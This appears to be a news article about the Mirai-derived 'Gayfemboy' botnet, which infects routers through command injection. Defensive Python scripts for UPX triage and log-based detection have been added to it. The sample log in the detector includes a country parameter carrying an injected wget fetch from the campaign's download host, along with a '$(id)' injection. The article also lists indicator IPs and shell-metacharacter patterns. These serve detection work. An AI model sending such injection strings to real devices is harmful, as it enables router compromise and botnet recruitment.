New Stealthy Malware Exploiting Cisco, TP-Link and Other Routers to Gain Remote Control

In Cybersecurity News. Original source: cybersecuritynews.com.

A newly observed malware campaign has emerged targeting a broad range of network appliances, including routers from DrayTek, TP-Link, Raisecom, and Cisco.

Throughout July 2025, threat researchers observed a stealthy loader spread by exploiting unauthenticated command injection flaws in embedded web services.

Initial compromise is achieved through straightforward HTTP requests, which silently deliver a downloader script tailored for each product. Once executed, these scripts fetch and launch the primary payload, granting attackers remote control over vulnerable systems worldwide.

The malware, dubbed “Gayfemboy” by its discoverers, builds upon the infamous Mirai botnet lineage but introduces significant enhancements in stealth and modularity.

Its infrastructure has been traced to a consistent download host at 220.158.234.135, while attack traffic originates from 87.121.84.34.

Payloads are delivered as seemingly innocuous files named after specific device architectures—such as “aalel” for AArch and “xale” for x86-64—to evade signature-based detection.

After the initial download the malware establishes persistence; its binary is UPX-packed with a modified magic header so that automated unpackers fail on it.
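A modified UPX magic is a triage problem for responders: the file is still compressed, but upx -d refuses it. The following helper, added here as an example and not code from the article or from Fortinet, measures byte entropy and looks for the stock UPX stub text alongside the "UPX!" magic. The stub strings come from UPX's own decompressor stub (an assumption about the packer, not something the article states), and all sample byte images are constructed in the block.

```python
import math
import random
from collections import Counter

ELF_MAGIC = b"\x7fELF"
UPX_MAGIC = b"UPX!"
# Text the stock UPX ELF stub embeds (assumption drawn from UPX itself, not the article);
# a sample that only patches the 4-byte magic usually leaves these strings intact.
UPX_STUB_STRINGS = (
    b"$Info: This file is packed with the UPX executable packer",
    b"UPX Team. All Rights Reserved.",
)
HIGH_ENTROPY = 7.0  # bits per byte; compressed or encrypted data sits close to 8.0

VERDICT_NOT_ELF = "not an ELF file"
VERDICT_CLEAN = "not packed"
VERDICT_UPX = "stock UPX packing (upx -d should unpack it)"
VERDICT_UPX_PATCHED = "UPX stub present but magic missing: modified header, expect upx -d to fail"
VERDICT_UNKNOWN_PACKER = "high entropy without UPX markers: unknown packer or encrypted payload"


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, about 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(blob: bytes) -> dict:
    """Classify a binary image pulled from a device; returns measurements plus a verdict."""
    is_elf = blob.startswith(ELF_MAGIC)
    entropy = shannon_entropy(blob)
    has_magic = UPX_MAGIC in blob
    has_stub = any(s in blob for s in UPX_STUB_STRINGS)

    if not is_elf:
        verdict = VERDICT_NOT_ELF
    elif has_magic and has_stub:
        verdict = VERDICT_UPX
    elif has_stub and not has_magic:
        # The decompressor stub is there but the magic was overwritten: the evasion
        # described in the article. The file is still compressed; the magic was patched.
        verdict = VERDICT_UPX_PATCHED
    elif entropy >= HIGH_ENTROPY:
        verdict = VERDICT_UNKNOWN_PACKER
    else:
        verdict = VERDICT_CLEAN
    return {
        "is_elf": is_elf,
        "entropy": round(entropy, 2),
        "upx_magic": has_magic,
        "upx_stub": has_stub,
        "verdict": verdict,
    }


def _random_bytes(n: int, seed: int = 7) -> bytes:
    """Deterministic pseudo-random filler standing in for compressed program data."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed sample images for the example; none of these are real malware bytes.
PACKED_BODY = _random_bytes(4096).replace(UPX_MAGIC, b"UPX?")  # keep filler free of the magic
SAMPLES = {
    "plain_binary": ELF_MAGIC + b"\x00" * 60 + b"router admin daemon\n" * 256,
    "stock_upx": ELF_MAGIC + UPX_STUB_STRINGS[0] + UPX_MAGIC + PACKED_BODY + UPX_MAGIC,
    "other_packer": ELF_MAGIC + PACKED_BODY,
    "not_elf": b"#!/bin/sh\necho hello\n",
}
# Same packed image with every "UPX!" overwritten, as the article says the malware does.
SAMPLES["patched_upx"] = SAMPLES["stock_upx"].replace(UPX_MAGIC, b"\x00\x00\x00\x00")

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        r = triage(blob)
        print(f"{name:14s} entropy={r['entropy']:.2f} magic={r['upx_magic']} "
              f"stub={r['upx_stub']} -> {r['verdict']}")
```

This is string-level triage only; a complete check parses UPX's l_info and p_info headers rather than searching for text. Its value is in the "stub present, magic missing" case, which tells an analyst to restore the four magic bytes before trying to unpack instead of concluding that the sample is not UPX at all.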

Fortinet analysts noted that the campaign’s global footprint includes targets in Brazil, Mexico, the United States, Germany, France, Switzerland, Israel, and Vietnam, spanning sectors from manufacturing to media.

The attackers leverage both HTTP and TFTP transports based on device capabilities, ensuring high success rates even in environments with limited outbound connections.

Analysis of the malware

Once the loader stages complete, the attacker gains a foothold with full root privileges, enabling further reconnaissance and lateral movement.

In this report, we delve deeper into the malware’s infection mechanism to shed light on how routine firmware interfaces are weaponized.

Attackers craft specific URI paths to trigger command injection in router web management panels.

TP-Link Archer AX21 exploit traffic (Source – Fortinet)

In the TP-Link case, the unauthenticated endpoint accepts arbitrary shell commands in the country parameter.

Upon receipt, the targeted router executes a lightweight shell snippet that downloads and executes the architecture-specific binary.

DrayTek devices exhibit analogous behavior through mainfunction.cgi.

DrayTek exploit traffic (Source – Fortinet)

Each staging script follows a consistent pattern: change to a writable directory, fetch the downloader, grant execution permissions, invoke it with a product identifier, and then remove traces.

Raisecom downloader script (Source – Fortinet)

By tailoring filenames and parameters to each vendor, the attackers avoid simple pattern matching while streamlining deployment across heterogeneous fleets.
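The two injection surfaces and the infrastructure named above are enough to build a first-pass detector for web-server access logs. The script below is an added example, not code from the article or from Fortinet: it parses common-format log lines, flags shell metacharacters in query parameters (the article names the TP-Link country parameter), flags mainfunction.cgi requests from outside a trusted management range, and flags any appearance of the two reported IP addresses. The /mgmt/locale path, the 10.0.0.0/8 management network and all log lines are constructed for the example; the article does not give the real TP-Link URI.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Infrastructure reported in the article (download host and attack source).
IOC_IPS = {"220.158.234.135", "87.121.84.34"}
# DrayTek endpoint the article names; the TP-Link URI is not given, so the
# query-parameter check below runs on every path instead.
SUSPECT_PATHS = ("mainfunction.cgi",)
# Networks from which management access is expected (constructed for this example).
TRUSTED_MGMT = [ipaddress.ip_network("10.0.0.0/8")]
# Metacharacters and command substitution that never belong in a locale or country code.
SHELL_META = re.compile(r"[;&|`]|\$\(|\$\{")
# Common log format: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def _trusted(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_MGMT)


def analyze_line(line: str):
    """Return a finding for one log line, or None when it is benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, target = m.group("src"), m.group("target")
    parts = urlsplit(target)
    reasons = []

    if src in IOC_IPS:
        reasons.append(f"source {src} is reported campaign infrastructure")
    if parts.path.endswith(SUSPECT_PATHS) and not _trusted(src):
        reasons.append(f"{parts.path} reached from untrusted address {src}")
    # parse_qs percent-decodes values; a second unquote catches double-encoded payloads.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SHELL_META.search(unquote(value)):
                reasons.append(f"shell metacharacters in parameter {name!r}: {value!r}")
    for ip in IOC_IPS:
        if ip in unquote(target):
            reasons.append(f"request references campaign host {ip}")

    if not reasons:
        return None
    return {"src": src, "target": target, "reasons": reasons}


def scan(log_text: str):
    """Run analyze_line over a whole log and keep only the lines with findings."""
    return [f for f in (analyze_line(ln) for ln in log_text.splitlines()) if f]


# Constructed sample log: one benign locale request, one injection attempt from the
# reported attack source, one staging fetch from the reported download host, one
# DrayTek endpoint hit from the attack source, and one ordinary page view.
SAMPLE_LOG = """\
10.0.0.7 - - [14/Jul/2025:10:01:12 +0000] "GET /mgmt/locale?country=US HTTP/1.1" 200 512
87.121.84.34 - - [14/Jul/2025:10:02:45 +0000] "GET /mgmt/locale?country=%24%28id%29 HTTP/1.1" 200 0
198.51.100.23 - - [14/Jul/2025:10:03:10 +0000] "GET /mgmt/locale?country=US%3Bwget%20http%3A%2F%2F220.158.234.135%2Faalel HTTP/1.1" 200 0
87.121.84.34 - - [14/Jul/2025:10:04:02 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 0
10.0.0.9 - - [14/Jul/2025:10:05:30 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["src"], finding["target"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run against the constructed log, the script reports three of the five lines. The metacharacter rule is deliberately broad because a country or locale value has no legitimate use for any of those characters; the IP match is the narrow, high-confidence rule and will age as the campaign moves hosts, which is why the two are combined rather than relying on the indicators alone.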

By continuously inspecting /proc/[PID]/exe of other processes, the malware also identifies and kills competing infections and debugging tools, consolidating its control over the device.

This injection-driven infection mechanism underscores the need for rigorous firmware integrity checks and network segmentation to prevent similar botnet campaigns.
